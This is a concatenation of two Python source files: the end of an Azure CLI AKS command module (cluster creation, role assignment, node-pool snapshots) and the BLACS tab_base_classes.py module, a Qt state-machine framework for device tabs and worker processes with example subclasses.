kubelet_identity_object_id = cluster.identity_profile["kubeletidentity"].object_id
_ensure_aks_acr(cmd,
assignee=kubelet_identity_object_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id,
is_service_principal=False)
else:
cluster = sdk_no_wait(no_wait, client.begin_create_or_update,
resource_group_name=resource_group_name,
resource_name=name,
parameters=managed_cluster,
headers=headers)
return cluster
def _ensure_cluster_identity_permission_on_kubelet_identity(cmd, cluster_identity_object_id, scope):
factory = get_auth_management_client(cmd.cli_ctx, scope)
assignments_client = factory.role_assignments
for i in assignments_client.list_for_scope(scope=scope, filter='atScope()'):
if i.scope.lower() != scope.lower():
continue
if not i.role_definition_id.lower().endswith(CONST_MANAGED_IDENTITY_OPERATOR_ROLE_ID):
continue
if i.principal_id.lower() != cluster_identity_object_id.lower():
continue
# already assigned
return
if not _add_role_assignment(cmd, CONST_MANAGED_IDENTITY_OPERATOR_ROLE, cluster_identity_object_id,
is_service_principal=False, scope=scope):
raise UnauthorizedError('Could not grant Managed Identity Operator '
'permission to cluster identity at scope {}'.format(scope))
def aks_snapshot_create(cmd, # pylint: disable=too-many-locals,too-many-statements,too-many-branches
client,
resource_group_name,
name,
nodepool_id,
location=None,
tags=None,
aks_custom_headers=None,
no_wait=False):
rg_location = get_rg_location(cmd.cli_ctx, resource_group_name)
if location is None:
location = rg_location
# load model CreationData, Snapshot
from azure.cli.command_modules.acs.decorator import AKSModels
CreationData = AKSModels(cmd, ResourceType.MGMT_CONTAINERSERVICE).CreationData
Snapshot = AKSModels(cmd, ResourceType.MGMT_CONTAINERSERVICE).Snapshot
creationData = CreationData(
source_resource_id=nodepool_id
)
snapshot = Snapshot(
name=name,
tags=tags,
location=location,
creation_data=creationData
)
# custom headers
aks_custom_headers = extract_comma_separated_string(
aks_custom_headers,
enable_strip=True,
extract_kv=True,
default_value={},
allow_appending_values_to_same_key=True,
)
return client.create_or_update(resource_group_name, name, snapshot, headers=aks_custom_headers)
def aks_snapshot_show(cmd, client, resource_group_name, name): # pylint: disable=unused-argument
snapshot = client.get(resource_group_name, name)
return snapshot
def aks_snapshot_delete(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
name,
no_wait=False,
yes=False):
msg = 'This will delete the snapshot "{}" in resource group "{}", Are you sure?'.format(name, resource_group_name)
if not yes and not prompt_y_n(msg, default="n"):
return None
return client.delete(resource_group_name, name)
def aks_snapshot_list(cmd, client, resource_group_name=None): # pylint: disable=unused-argument
if resource_group_name is None or resource_group_name == '':
return client.list()
return client.list_by_resource_group(resource_group_name)
|
tab_base_classes.py
|
#####################################################################
# #
# /tab_base_classes.py #
# #
# Copyright 2013, Monash University #
# #
# This file is part of the program BLACS, in the labscript suite #
# (see http://labscriptsuite.org), and is licensed under the #
# Simplified BSD License. See the license.txt file in the root of #
# the project for the full license. #
# #
#####################################################################
from zprocess import Process
from Queue import Queue as Queue
import time
import sys
import threading
import cPickle
import traceback
import logging
import cgi
import os
from types import GeneratorType
import zprocess
#import labscript_utils.excepthook
if 'PySide' in sys.modules.copy():
from PySide.QtCore import *
from PySide.QtGui import *
else:
from PyQt4.QtCore import *
from PyQt4.QtGui import *
from qtutils import *
class Counter(object):
"""A class with a single method that
returns a different integer each time it's called."""
def __init__(self):
self.i = 0
def get(self):
self.i += 1
return self.i
MODE_MANUAL = 1
MODE_TRANSITION_TO_BUFFERED = 2
MODE_TRANSITION_TO_MANUAL = 4
MODE_BUFFERED = 8
class StateQueue(object):
# NOTE:
#
# It is theoretically possible to remove the dependency on the Qt Mainloop (remove inmain decorators and fnuction calls)
# by introducing a local lock object instead. However, be aware that right now, the Qt inmain lock is preventing the
# statemachine loop (Tab.mainloop) from getting any states uot of the queue until after the entire tab is initialised
# and the Qt mainloop starts.
#
# This is particularly important because we exploit this behaviour to make sure that Tab._initialise_worker is placed at the
# start of the StateQueue, and so the Tab.mainloop method is guaranteed to get this initialisation method as the first state
# regardless of whether the mainloop is started before the state is inserted (the state should always be inserted as part of
# the call to Tab.create_worker, in DeviceTab.initialise_workers in DeviceTab.__init__ )
#
def __init__(self,device_name):
self.logger = logging.getLogger('BLACS.%s.state_queue'%(device_name))
self.logging_enabled = False
if self.logging_enabled:
self.logger.debug("started")
self.list_of_states = []
self._last_requested_state = None
# A queue that blocks the get(requested_state) method until an entry in the queue has a state that matches the requested_state
self.get_blocking_queue = Queue()
@property
@inmain_decorator(True)
# This is always done in main so that we avoid a race condition between the get method and
# the put method accessing this property
def last_requested_state(self):
return self._last_requested_state
@last_requested_state.setter
@inmain_decorator(True)
def last_requested_state(self, value):
self._last_requested_state = value
def log_current_states(self):
if self.logging_enabled:
self.logger.debug('Current items in the state queue: %s'%str(self.list_of_states))
# this should only happen in the main thread, as my implementation is not thread safe!
@inmain_decorator(True)
def put(self,allowed_states,queue_state_indefinitely,delete_stale_states,data,prepend=False):
if prepend:
self.list_of_states.insert(0,[allowed_states,queue_state_indefinitely,delete_stale_states,data])
else:
self.list_of_states.append([allowed_states,queue_state_indefinitely,delete_stale_states,data])
# if this state is one the get command is waiting for, notify it!
if self.last_requested_state is not None and allowed_states&self.last_requested_state:
self.get_blocking_queue.put('new item')
if self.logging_enabled:
if not isinstance(data[0],str):
self.logger.debug('New state queued up. Allowed modes: %d, queue state indefinitely: %s, delete stale states: %s, function: %s'%(allowed_states,str(queue_state_indefinitely),str(delete_stale_states),data[0].__name__))
self.log_current_states()
# this should only happen in the main thread, as my implementation is not thread safe!
@inmain_decorator(True)
def check_for_next_item(self,state):
# We reset the queue here, as we are about to traverse the tree, which contains any new items that
# are described in messages in this queue, so let's not keep those messages around anymore.
# Put another way, we want to block until a new item is added, if we don't find an item in this function
# So it's best if the queue is empty now!
if self.logging_enabled:
self.logger.debug('Re-initialsing self._get_blocking_queue')
self.get_blocking_queue = Queue()
# traverse the list
delete_index_list = []
success = False
for i,item in enumerate(self.list_of_states):
allowed_states,queue_state_indefinitely,delete_stale_states,data = item
if self.logging_enabled:
self.logger.debug('iterating over states in queue')
if allowed_states&state:
# We have found one! Remove it from the list
delete_index_list.append(i)
if self.logging_enabled:
self.logger.debug('requested state found in queue')
# If we are to delete stale states, see if the next state is the same statefunction.
# If it is, use that one, or whichever is the latest entry without encountering a different statefunction,
# and delete the rest
if delete_stale_states:
state_function = data[0]
i+=1
while i < len(self.list_of_states) and state_function == self.list_of_states[i][3][0]:
if self.logging_enabled:
self.logger.debug('requesting deletion of stale state')
allowed_states,queue_state_indefinitely,delete_stale_states,data = self.list_of_states[i]
delete_index_list.append(i)
i+=1
success = True
break
elif not queue_state_indefinitely:
if self.logging_enabled:
self.logger.debug('state should not be queued indefinitely')
delete_index_list.append(i)
# do this in reverse order so that the first delete operation doesn't mess up the indices of subsequent ones
for index in reversed(sorted(delete_index_list)):
if self.logging_enabled:
self.logger.debug('deleting state')
del self.list_of_states[index]
if not success:
data = None
return success,data
# this method should not be called in the main thread, because it will block until something is found...
# Please, only have one thread ever accessing this...I have no idea how it will behave if multiple threads are trying to get
# items from the queue...
#
# This method will block until a item found in the queue is found to be allowed during the specified 'state'.
def get(self,state):
if self.last_requested_state:
raise Exception('You have multiple threads trying to get from this queue at the same time. I won\'t allow it!')
self.last_requested_state = state
while True:
if self.logging_enabled:
self.logger.debug('requesting next item in queue with mode %d'%state)
inmain(self.log_current_states)
status,data = self.check_for_next_item(state)
if not status:
# we didn't find anything useful, so we'll wait until a useful state is added!
self.get_blocking_queue.get()
else:
self.last_requested_state = None
return data
# Make this function available globally:
get_unique_id = Counter().get
def define_state(allowed_modes,queue_state_indefinitely,delete_stale_states=False):
def wrap(function):
unescaped_name = function.__name__
escapedname = '_' + function.__name__
if allowed_modes < 1 or allowed_modes > 15:
raise RuntimeError('Function %s has been set to run in unknown states. Please make sure allowed states is one or more of MODE_MANUAL,'%unescaped_name+
'MODE_TRANSITION_TO_BUFFERED, MODE_TRANSITION_TO_MANUAL and MODE_BUFFERED (or-ed together using the | symbol, eg MODE_MANUAL|MODE_BUFFERED')
def f(self,*args,**kwargs):
function.__name__ = escapedname
#setattr(self,escapedname,function)
self.event_queue.put(allowed_modes,queue_state_indefinitely,delete_stale_states,[function,[args,kwargs]])
f.__name__ = unescaped_name
f._allowed_modes = allowed_modes
return f
return wrap
class Tab(object):
def __init__(self,notebook,settings,restart=False):
# Store important parameters
self.notebook = notebook
self.settings = settings
self._device_name = self.settings["device_name"]
# Setup logging
self.logger = logging.getLogger('BLACS.%s'%(self.device_name))
self.logger.debug('Started')
# Setup the timer for updating that tab text label when the tab is not
# actively part of a notebook
self._tab_text_timer = QTimer()
self._tab_text_timer.timeout.connect(self.update_tab_text_colour)
self._tab_text_colour = 'black'
# Create instance variables
self._not_responding_error_message = ''
self._error = ''
self._state = ''
self._time_of_last_state_change = time.time()
self.not_responding_for = 0
self.hide_not_responding_error_until = 0
self._timeouts = set()
self._timeout_ids = {}
self._force_full_buffered_reprogram = True
self.event_queue = StateQueue(self.device_name)
self.workers = {}
self._supports_smart_programming = False
self._restart_receiver = []
# Load the UI
self._ui = UiLoader().load(os.path.join(os.path.dirname(os.path.realpath(__file__)),'tab_frame.ui'))
self._layout = self._ui.device_layout
self._device_widget = self._ui.device_controls
self._changed_widget = self._ui.changed_widget
self._changed_layout = self._ui.changed_layout
self._changed_widget.hide()
self.BLACS_connection = self.settings['connection_table'].find_by_name(self.device_name).BLACS_connection
self._ui.device_name.setText("<b>%s</b> <br />Connection: %s"%(str(self.device_name),str(self.BLACS_connection)))
# connect signals
self._ui.smart_programming.toggled.connect(self.on_force_full_buffered_reprogram)
self._ui.smart_programming.setEnabled(False)
self.force_full_buffered_reprogram = True
self._ui.button_close.clicked.connect(self.hide_error)
self._ui.button_restart.clicked.connect(self.restart)
self._update_error()
self.supports_smart_programming(False)
# This should be done beofre the main_loop starts or else there is a race condition as to whether the
# self._mode variable is even defined!
# However it must be done after the UI is created!
self.mode = MODE_MANUAL
self.state = 'idle'
# Setup the not responding timeout
self._timeout = QTimer()
self._timeout.timeout.connect(self.check_time)
self._timeout.start(1000)
# Launch the mainloop
self._mainloop_thread = threading.Thread(target = self.mainloop)
self._mainloop_thread.daemon = True
self._mainloop_thread.start()
# Add the tab to the notebook
self.notebook.addTab(self._ui,self.device_name)
self._ui.show()
def supports_smart_programming(self,support):
self._supports_smart_programming = bool(support)
if self._supports_smart_programming:
self._ui.smart_programming.show()
else:
self._ui.smart_programming.hide()
def on_force_full_buffered_reprogram(self,toggled):
self.force_full_buffered_reprogram = toggled
@property
def force_full_buffered_reprogram(self):
return self._force_full_buffered_reprogram
@force_full_buffered_reprogram.setter
def force_full_buffered_reprogram(self,value):
self._force_full_buffered_reprogram = bool(value)
self._ui.smart_programming.setChecked(bool(value))
@property
@inmain_decorator(True)
def error_message(self):
return self._error
@error_message.setter
@inmain_decorator(True)
def error_message(self,message):
#print message
#print self._error
if message != self._error:
self._error = message
self._update_error()
@inmain_decorator(True)
def _update_error(self):
prefix = '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN" "http://www.w3.org/TR/REC-html40/strict.dtd">\n<html><head><meta name="qrichtext" content="1" /><style type="text/css">\np, li { white-space: pre-wrap; }\n</style></head><body style=" font-family:"MS Shell Dlg 2"; font-size:7.8pt; font-weight:400; font-style:normal;">'
suffix = '</body></html>'
#print threading.current_thread().name
self._ui.error_message.setHtml(prefix+self._not_responding_error_message+self._error+suffix)
if self._error or self._not_responding_error_message:
self._ui.notresponding.show()
self._tab_text_colour = 'red'
self.update_tab_text_colour()
else:
self._ui.notresponding.hide()
self._tab_text_colour = 'black'
self.update_tab_text_colour()
@inmain_decorator(True)
def update_tab_text_colour(self):
try:
self.notebook = self._ui.parentWidget().parentWidget()
currentpage = None
if self.notebook:
#currentpage = self.notebook.get_current_page()
currentpage = self.notebook.indexOf(self._ui)
if currentpage == -1:
raise Exception('')
else:
self.notebook.tabBar().setTabTextColor(currentpage,QColor(self._tab_text_colour))
self._tab_text_timer.stop()
else:
raise Exception('')
except Exception:
if not self._tab_text_timer.isActive():
self._tab_text_timer.start(100)
def get_tab_layout(self):
return self._layout
@property
def device_name(self):
return self._device_name
# sets the mode, switches between MANUAL, BUFFERED, TRANSITION_TO_BUFFERED and TRANSITION_TO_STATIC
@property
def mode(self):
return self._mode
@mode.setter
def mode(self,mode):
self._mode = mode
self._update_state_label()
@property
def state(self):
return self._state
@state.setter
def state(self,state):
self._state = state
self._time_of_last_state_change = time.time()
self._update_state_label()
@inmain_decorator(True)
def _update_state_label(self):
if self.mode == 1:
mode = 'Manual'
elif self.mode == 2:
mode = 'Transitioning to buffered'
elif self.mode == 4:
mode = 'Transitioning to manual'
elif self.mode == 8:
mode = 'Buffered'
else:
raise RuntimeError('self.mode for device %s is invalid. It must be one of MODE_MANUAL, MODE_TRANSITION_TO_BUFFERED, MODE_TRANSITION_TO_MANUAL or MODE_BUFFERED'%(self.device_name))
self._ui.state_label.setText('<b>%s mode</b> - State: %s'%(mode,self.state))
# Todo: Update icon in tab
def create_worker(self,name,WorkerClass,workerargs={}):
if name in self.workers:
raise Exception('There is already a worker process with name: %s'%name)
if name == 'GUI':
# This is here so that we can display "(GUI)" in the status bar and have the user confident this is actually happening in the GUI,
# not in a worker process named GUI
raise Exception('You cannot call a worker process "GUI". Why would you want to? Your worker process cannot interact with the BLACS GUI directly, so you are just trying to confuse yourself!')
worker = WorkerClass()
to_worker, from_worker = worker.start(name, self.device_name, workerargs)
self.workers[name] = (worker,to_worker,from_worker)
self.event_queue.put(MODE_MANUAL|MODE_BUFFERED|MODE_TRANSITION_TO_BUFFERED|MODE_TRANSITION_TO_MANUAL,True,False,[Tab._initialise_worker,[(name,),{}]],prepend=True)
def _initialise_worker(self, worker_name):
yield(self.queue_work(worker_name,'init'))
if self.error_message:
raise Exception('Device failed to initialise')
@define_state(MODE_MANUAL|MODE_BUFFERED|MODE_TRANSITION_TO_BUFFERED|MODE_TRANSITION_TO_MANUAL,True)
def _timeout_add(self,delay,execute_timeout):
QTimer.singleShot(delay,execute_timeout)
def statemachine_timeout_add(self,delay,statefunction,*args,**kwargs):
# Add the timeout to our set of registered timeouts. Timeouts
# can thus be removed by the user at ay time by calling
# self.timeouts.remove(function)
self._timeouts.add(statefunction)
# Here's a function which executes the timeout once, then queues
# itself up again after a delay:
def execute_timeout():
# queue up the state function, but only if it hasn't been
# removed from self.timeouts:
if statefunction in self._timeouts and self._timeout_ids[statefunction] == unique_id:
# Only queue up the state if we are in an allowed mode
if statefunction._allowed_modes&self.mode:
statefunction(*args, **kwargs)
# queue up another call to this function (execute_timeout)
# after the delay time:
self._timeout_add(delay,execute_timeout)
# Store a unique ID for this timeout so that we don't confuse
# other timeouts for this one when checking to see that this
# timeout hasn't been removed:
unique_id = get_unique_id()
self._timeout_ids[statefunction] = unique_id
# queue the first run:
#QTimer.singleShot(delay,execute_timeout)
execute_timeout()
# Returns True if the timeout was removed
def statemachine_timeout_remove(self,statefunction):
if statefunction in self._timeouts:
self._timeouts.remove(statefunction)
return True
return False
# returns True if at least one timeout was removed, else returns False
def statemachine_timeout_remove_all(self):
# As a consistency check, we overwrite self._timeouts to an empty set always
# This must be done after the check to see if it is empty (if self._timeouts) so do not refactor this code!
if self._timeouts:
self._timeouts = set()
return True
else:
self._timeouts = set()
return False
# def set_state(self,state):
# ready = self.tab_label_widgets['ready']
# working = self.tab_label_widgets['working']
# error = self.tab_label_widgets['error']
# self.logger.info('State changed to %s'% state)
# self.state = state
# if state == 'idle':
# working.hide()
# if self.error:
# error.show()
# else:
# ready.show()
# error.hide()
# elif state == 'fatal error':
# working.hide()
# error.show()
# ready.hide()
# else:
# ready.hide()
# working.show()
# self._time_of_last_state_change = time.time()
# self.statusbar.push(self.context_id, state)
def close_tab(self,*args):
self.logger.info('close_tab called')
self._timeout.stop()
self._tab_text_timer.stop()
for name,worker_data in self.workers.items():
worker_data[0].terminate()
# The mainloop is blocking waiting for something out of the
# from_worker queue or the event_queue. Closing the queues doesn't
# seem to raise an EOF for them, likely because it only closes
# them from our end, and an EOFError would only be raised if it
# was closed from the other end, which we can't make happen. But
# we can instruct it to quit by telling it to do so through the
# queue itself. That way we don't leave extra threads running
# (albeit doing nothing) that we don't need:
if self._mainloop_thread.is_alive():
worker_data[2].put((False,'quit',None))
self.event_queue.put(MODE_MANUAL|MODE_BUFFERED|MODE_TRANSITION_TO_BUFFERED|MODE_TRANSITION_TO_MANUAL,True,False,['_quit',None],prepend=True)
self.notebook = self._ui.parentWidget().parentWidget()
currentpage = None
if self.notebook:
#currentpage = self.notebook.get_current_page()
currentpage = self.notebook.indexOf(self._ui)
self.notebook.removeTab(currentpage)
temp_widget = QWidget()
self.notebook.insertTab(currentpage, temp_widget, self.device_name)
self.notebook.setCurrentWidget(temp_widget)
return currentpage
def connect_restart_receiver(self,function):
if function not in self._restart_receiver:
self._restart_receiver.append(function)
def disconnect_restart_receiver(self,function):
if function in self._restart_receiver:
self._restart_receiver.remove(function)
def restart(self,*args):
# notify all connected receivers:
for f in self._restart_receiver:
try:
f(self.device_name)
except:
self.logger.exception('Could not notify a connected receiver function')
currentpage = self.close_tab()
self.logger.info('***RESTART***')
self.settings['saved_data'] = self.get_save_data()
self._restart_thread = inthread(self.wait_for_mainloop_to_stop, currentpage)
def wait_for_mainloop_to_stop(self, currentpage):
self._mainloop_thread.join()
inmain(self.clean_ui_on_restart)
inmain(self.finalise_restart, currentpage)
def clean_ui_on_restart(self):
# Clean up UI
ui = self._ui
self._ui = None
ui.setParent(None)
ui.deleteLater()
del ui
def finalise_restart(self, currentpage):
widget = self.notebook.widget(currentpage)
widget.setParent(None)
widget.deleteLater()
del widget
# Note: the following function call will break if the user hasn't
# overridden the __init__ function to take these arguments. So
# make sure you do that!
self.__init__(self.notebook, self.settings,restart=True)
# The init method is going to place this device tab at the end of the notebook specified
# Let's remove it from there, and place it the poition it used to be!
self.notebook = self._ui.parentWidget().parentWidget()
self.notebook.removeTab(self.notebook.indexOf(self._ui))
self.notebook.insertTab(currentpage,self._ui,self.device_name)
self.notebook.setCurrentWidget(self._ui)
# If BLACS is waiting on this tab for something, tell it to abort!
# self.BLACS.current_queue.put('abort')
def queue_work(self,worker_process,worker_function,*args,**kwargs):
return worker_process,worker_function,args,kwargs
def hide_error(self):
# dont show the error again until the not responding time has doubled:
self.hide_not_responding_error_until = 2*self.not_responding_for
self._ui.notresponding.hide()
self.error_message = ''
#self.tab_label_widgets['error'].hide()
#if self.state == 'idle':
# self.tab_label_widgets['ready'].show()
def check_time(self):
if self.state in ['idle','fatal error']:
self.not_responding_for = 0
if self._not_responding_error_message:
self._not_responding_error_message = ''
self._update_error()
else:
self.not_responding_for = time.time() - self._time_of_last_state_change
if self.not_responding_for > 5 + self.hide_not_responding_error_until:
self.hide_not_responding_error_for = 0
self._ui.notresponding.show()
hours, remainder = divmod(int(self.not_responding_for), 3600)
minutes, seconds = divmod(remainder, 60)
if hours:
s = '%s hours'%hours
elif minutes:
s = '%s minutes'%minutes
else:
s = '%s seconds'%seconds
self._not_responding_error_message = 'The hardware process has not responded for %s.<br /><br />'%s
self._update_error()
return True
def mainloop(self):
logger = logging.getLogger('BLACS.%s.mainloop'%(self.settings['device_name']))
logger.debug('Starting')
# Store a reference to the state queue and workers, this way if the tab is restarted, we won't ever get access to the new state queue created then
event_queue = self.event_queue
workers = self.workers
try:
while True:
# Get the next task from the event queue:
logger.debug('Waiting for next event')
func, data = event_queue.get(self.mode)
if func == '_quit':
# The user has requested a restart:
logger.debug('Received quit signal')
break
args,kwargs = data
logger.debug('Processing event %s' % func.__name__)
self.state = '%s (GUI)'%func.__name__
# Run the task with the GUI lock, catching any exceptions:
#func = getattr(self,funcname)
# run the function in the Qt main thread
generator = inmain(func,self,*args,**kwargs)
# Do any work that was queued up:(we only talk to the worker if work has been queued up through the yield command)
if type(generator) == GeneratorType:
# We need to call next recursively, queue up work and send the results back until we get a StopIteration exception
generator_running = True
break_main_loop = False
# get the data from the first yield function
worker_process,worker_function,worker_args,worker_kwargs = inmain(generator.next)
# Continue until we get a StopIteration exception, or the user requests a restart
while generator_running:
try:
logger.debug('Instructing worker %s to do job %s'%(worker_process,worker_function) )
worker_arg_list = (worker_function,worker_args,worker_kwargs)
# This line is to catch if you try to pass unpickleable objects.
try:
cPickle.dumps(worker_arg_list)
except:
self.error_message += 'Attempt to pass unserialisable object to child process:'
raise
# Send the command to the worker
to_worker = workers[worker_process][1]
from_worker = workers[worker_process][2]
to_worker.put(worker_arg_list)
self.state = '%s (%s)'%(worker_function,worker_process)
# Confirm that the worker got the message:
logger.debug('Waiting for worker to acknowledge job request')
success, message, results = from_worker.get()
if not success:
if message == 'quit':
# The user has requested a restart:
logger.debug('Received quit signal')
# This variable is set so we also break out of the toplevel main loop
break_main_loop = True
break
logger.info('Worker reported failure to start job')
raise Exception(message)
# Wait for and get the results of the work:
logger.debug('Worker reported job started, waiting for completion')
success,message,results = from_worker.get()
if not success and message == 'quit':
# The user has requested a restart:
logger.debug('Received quit signal')
# This variable is set so we also break out of the toplevel main loop
break_main_loop = True
break
if not success:
logger.info('Worker reported exception during job')
now = time.strftime('%a %b %d, %H:%M:%S ',time.localtime())
self.error_message += ('Exception in worker - %s:<br />' % now +
'<FONT COLOR=\'#ff0000\'>%s</FONT><br />'%cgi.escape(message).replace(' ',' ').replace('\n','<br />'))
else:
logger.debug('Job completed')
# Reset the hide_not_responding_error_until, since we have now heard from the child
self.hide_not_responding_error_until = 0
# Send the results back to the GUI function
logger.debug('returning worker results to function %s' % func.__name__)
self.state = '%s (GUI)'%func.__name__
next_yield = inmain(generator.send,results)
# If there is another yield command, put the data in the required variables for the next loop iteration
if next_yield:
worker_process,worker_function,worker_args,worker_kwargs = next_yield
except StopIteration:
# The generator has finished. Ignore the error, but stop the loop
logger.debug('Finalising function')
generator_running = False
# Break out of the main loop if the user requests a restart
if break_main_loop:
logger.debug('Breaking out of main loop')
break
self.state = 'idle'
except:
# Some unhandled error happened. Inform the user, and give the option to restart
message = traceback.format_exc()
logger.critical('A fatal exception happened:\n %s'%message)
now = time.strftime('%a %b %d, %H:%M:%S ',time.localtime())
self.error_message += ('Fatal exception in main process - %s:<br /> '%now +
'<FONT COLOR=\'#ff0000\'>%s</FONT><br />'%cgi.escape(message).replace(' ',' ').replace('\n','<br />'))
self.state = 'fatal error'
# do this in the main thread
inmain(self._ui.button_close.setEnabled,False)
logger.info('Exiting')
class Worker(Process):
def init(self):
# To be overridden by subclasses
pass
def run(self, worker_name, device_name, extraargs):
self.worker_name = worker_name
self.device_name = device_name
for argname in extraargs:
setattr(self,argname,extraargs[argname])
# Total fudge, should be replaced with zmq logging in future:
from setup_logging import setup_logging
setup_logging()
log_name = 'BLACS.%s_%s.worker'%(self.device_name,self.worker_name)
self.logger = logging.getLogger(log_name)
self.logger.debug('Starting')
import zprocess.locking, labscript_utils.h5_lock
zprocess.locking.set_client_process_name(log_name)
#self.init()
self.mainloop()
def mainloop(self):
while True:
# Get the next task to be done:
self.logger.debug('Waiting for next job request')
funcname, args, kwargs = self.from_parent.get()
self.logger.debug('Got job request %s' % funcname)
try:
# See if we have a method with that name:
func = getattr(self,funcname)
success = True
message = ''
except AttributeError:
success = False
message = traceback.format_exc()
self.logger.error('Couldn\'t start job:\n %s'%message)
# Report to the parent whether method lookup was successful or not:
self.to_parent.put((success,message,None))
if success:
# Try to do the requested work:
self.logger.debug('Starting job %s'%funcname)
try:
results = func(*args,**kwargs)
success = True
message = ''
self.logger.debug('Job complete')
except:
results = None
success = False
traceback_lines = traceback.format_exception(*sys.exc_info())
del traceback_lines[1]
message = ''.join(traceback_lines)
self.logger.error('Exception in job:\n%s'%message)
# Check if results object is serialisable:
try:
cPickle.dumps(results)
except:
message = traceback.format_exc()
self.logger.error('Job returned unserialisable datatypes, cannot pass them back to parent.\n' + message)
message = 'Attempt to pass unserialisable object %s to parent process:\n' % str(results) + message
success = False
results = None
# Report to the parent whether work was successful or not,
# and what the results were:
self.to_parent.put((success,message,results))
# Example code! Two classes are defined below, which are subclasses
# of the ones defined above. They show how to make a Tab class,
# and a Worker class, and get the Tab to request work to be done by
# the worker in response to GUI events.
class MyTab(Tab):
def __init__(self,notebook,settings,restart=False): # restart will be true if __init__ was called due to a restart
Tab.__init__(self,notebook,settings,restart) # Make sure to call this first in your __init__!
self.create_worker('My worker',MyWorker,{'x':7})
# foobutton = gtk.Button('foo, 10 seconds!')
# barbutton = gtk.Button('bar, 10 seconds, then error!')
# bazbutton = gtk.Button('baz, 0.5 seconds!')
# addbazbutton = gtk.Button('add 2 second timeout to baz')
# removebazbutton = gtk.Button('remove baz timeout')
# bazunpickleable= gtk.Button('try to pass baz a multiprocessing.Lock()')
# fatalbutton = gtk.Button('fatal error, forgot to add @define_state to callback!')
# self.checkbutton=gtk.CheckButton('have baz\nreturn a Queue')
# self.toplevel = gtk.VBox()
# self.toplevel.pack_start(foobutton)
# self.toplevel.pack_start(barbutton)
# hbox = gtk.HBox()
# self.toplevel.pack_start(hbox)
# hbox.pack_start(bazbutton)
# hbox.pack_start(addbazbutton)
# hbox.pack_start(removebazbutton)
# hbox.pack_start(bazunpickleable)
# hbox.pack_start(self.checkbutton)
# self.toplevel.pack_start(fatalbutton)
# foobutton.connect('clicked', self.foo)
# barbutton.connect('clicked', self.bar)
# bazbutton.connect('clicked', self.baz)
# fatalbutton.connect('clicked',self.fatal )
# addbazbutton.connect('clicked',self.add_baz_timeout)
# removebazbutton.connect('clicked',self.remove_baz_timeout)
# bazunpickleable.connect('clicked', self.baz_unpickleable)
# # These two lines are required to top level widget (buttonbox
# # in this case) to the existing GUI:
# self.viewport.add(self.toplevel)
# self.toplevel.show_all()
self.initUI()
def initUI(self):
self.layout = self.get_tab_layout()
foobutton = QPushButton('foo, 10 seconds!')
barbutton = QPushButton('bar, 10 seconds, then error!')
bazbutton = QPushButton('baz, 0.5 seconds!')
addbazbutton = QPushButton('add 2 second timeout to baz')
removebazbutton = QPushButton('remove baz timeout')
bazunpickleable= QPushButton('try to pass baz a threading.Lock()')
fatalbutton = QPushButton('fatal error, forgot to add @define_state to callback!')
self.checkbutton = QPushButton('have baz\nreturn a Queue')
self.checkbutton.setCheckable(True)
#self.device_widget.addWidget(layout)
self.layout.addWidget(foobutton)
self.layout.addWidget(barbutton)
self.layout.addWidget(bazbutton)
self.layout.addWidget(addbazbutton)
self.layout.addWidget(removebazbutton)
self.layout.addWidget(bazunpickleable)
self.layout.addWidget(fatalbutton)
self.layout.addWidget(self.checkbutton)
foobutton.clicked.connect(self.foo)
barbutton.clicked.connect(self.bar)
bazbutton.clicked.connect(self.baz)
fatalbutton.clicked.connect(self.fatal )
addbazbutton.clicked.connect(self.add_baz_timeout)
removebazbutton.clicked.connect(self.remove_baz_timeout)
bazunpickleable.clicked.connect(self.baz_unpickleable)
# It is critical that you decorate your callbacks with @define_state
# as below. This makes the function get queued up and executed
# in turn by our state machine instead of immediately by the
# GTK mainloop. Only don't decorate if you're certain that your
# callback can safely happen no matter what state the system is
# in (for example, adjusting the axis range of a plot, or other
# appearance settings). You should never be calling queue_work
# or do_after from un undecorated callback.
@define_state(MODE_MANUAL,True)
def foo(self):
self.logger.debug('entered foo')
#self.toplevel.set_sensitive(False)
# Here's how you instruct the worker process to do
# something. When this callback returns, the worker will be
# requested to do whatever you ask in queue_work (in this
# case, MyWorker.foo(5,6,7,x='x') ). Then, no events will
# be processed until that work is done. Once the work is
# done, whatever has been set with do_after will be executed
# (in this case self.leave_foo(1,2,3,bar=baz) ).
results = yield(self.queue_work('My worker','foo', 5,6,7,x='x'))
#self.toplevel.set_sensitive(True)
self.logger.debug('leaving foo')
# Here's what's NOT to do: forgetting to decorate a callback with @define_state
# when it's not something that can safely be done asynchronously
# to the state machine:
def fatal(self):
# This bug could be hard to track because nothing will happen
# when you click the button -- only once you do some other,
# correcly decorated callback will it become apparant that
# something is wrong. So don't make this mistake!
self.queue_work('My worker','foo', 5,6,7,x='x')
@define_state(MODE_MANUAL,True)
def bar(self):
self.logger.debug('entered bar')
results = yield(self.queue_work('My worker','bar', 5,6,7,x=5))
self.logger.debug('leaving bar')
@define_state(MODE_MANUAL,True)
def baz(self, button=None):
print threading.current_thread().name
self.logger.debug('entered baz')
results = yield(self.queue_work('My worker','baz', 5,6,7,x='x',return_queue=self.checkbutton.isChecked()))
print results
print threading.current_thread().name
results = yield(self.queue_work('My worker','baz', 4,6,7,x='x',return_queue=self.checkbutton.isChecked()))
print results
print threading.current_thread().name
self.logger.debug('leaving baz')
# This event shows what happens if you try to send a unpickleable
# event through a queue to the subprocess:
@define_state(MODE_MANUAL,True)
def baz_unpickleable(self):
self.logger.debug('entered baz_unpickleable')
results = yield(self.queue_work('My worker','baz', 5,6,7,x=threading.Lock()))
self.logger.debug('leaving baz_unpickleable')
# You don't need to decorate with @define_state if all you're
# doing is adding a timeout -- adding a timeout can safely be done
# asynchronously. But you can still decorate if you want, and you
# should if you're doing other work in the same function call which
# can't be done asynchronously.
def add_baz_timeout(self):
self.statemachine_timeout_add(2000,self.baz)
# Similarly, no @define_state is required here -- same applies as above.
def remove_baz_timeout(self):
self.statemachine_timeout_remove(self.baz)
class MyWorker(Worker):
def init(self):
# You read correctly, this isn't __init__, it's init. It's the
# first thing that will be called in the new process. You should
# do imports here, define instance variables, that sort of thing. You
# shouldn't import the hardware modules at the top of your file,
# because then they will be imported in both the parent and
# the child processes and wont be cleanly restarted when the subprocess
# is restarted. Since we're inside a method call though, you'll
# have to use global statements for the module imports, as shown
# below. Either that or you can make them instance variables, ie:
# import module; self.module = module. Up to you, I prefer
# the former.
global serial; import serial
self.logger.info('got x! %d' % self.x)
raise Exception('bad import!')
